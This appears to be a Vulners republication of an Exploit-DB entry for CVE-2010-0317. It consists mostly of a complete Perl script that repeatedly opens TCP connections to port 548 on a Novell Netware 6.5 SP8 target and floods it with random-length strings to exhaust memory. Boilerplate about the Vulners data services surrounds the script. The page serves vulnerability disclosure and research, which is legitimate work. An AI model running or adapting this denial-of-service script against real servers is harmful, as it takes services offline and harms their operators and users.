Lucene search
+L

Novell Netware - CIFS and AFP Remote Memory Consumption Denial of Service

🗓️ 05 Jan 2010 00:00:00Reported by Francis ProvencherType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 42 Views

Novell Netware CIFS and AFP Remote Memory Consumption Denial of Service scrip

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-0317
5 Jan 201000:00
circl
cve
CVE
CVE-2010-0317
15 Jan 201018:00
cve
cvelist
Cvelist
CVE-2010-0317
15 Jan 201018:00
cvelist
euvd
EUVD
EUVD-2010-0348
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-0317
15 Jan 201018:30
nvd
prion
Prion
Null pointer dereference
15 Jan 201018:30
prion
#!/usr/bin/perl
#	Novell Netware CIFS And AFP Remote Memory Consumption DoS
#	Platform: Novell Netware 6.5 SP8
#       Found by Francis Provencher for Protek Research Lab's
#	http://protekresearch.blogspot.com/
#       {PRL} Novell Netware CIFS.nlm Remote Memory Consumption Denial of Service
#       Here is a modified version from the script written by the researcher Jeremy Brown
#       http://jbrownsec.blogspot.com/2009/12/writing-code-that-breaks-code.html
#

use IO::Socket;
use String::Random;

$target   = $ARGV[0];
$port     = 548;
$protocol = tcp;
$maxsize  = 666;
$random   = 0;

if((!defined($target) || !defined($port) || !defined($protocol) || !defined($maxsize)))
{
     print "usage: $0 <target> \n";
     exit;
}

while(1)
{
$sock = IO::Socket::INET->new(Proto=>$protocol, PeerHost=>$target, PeerPort=>$port)
        or logit();

$rand   = new String::Random;
$random = $rand->randpattern("." x rand($maxsize)) . "\r\n\r\n";

     $sock->send($random);
     close($sock);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation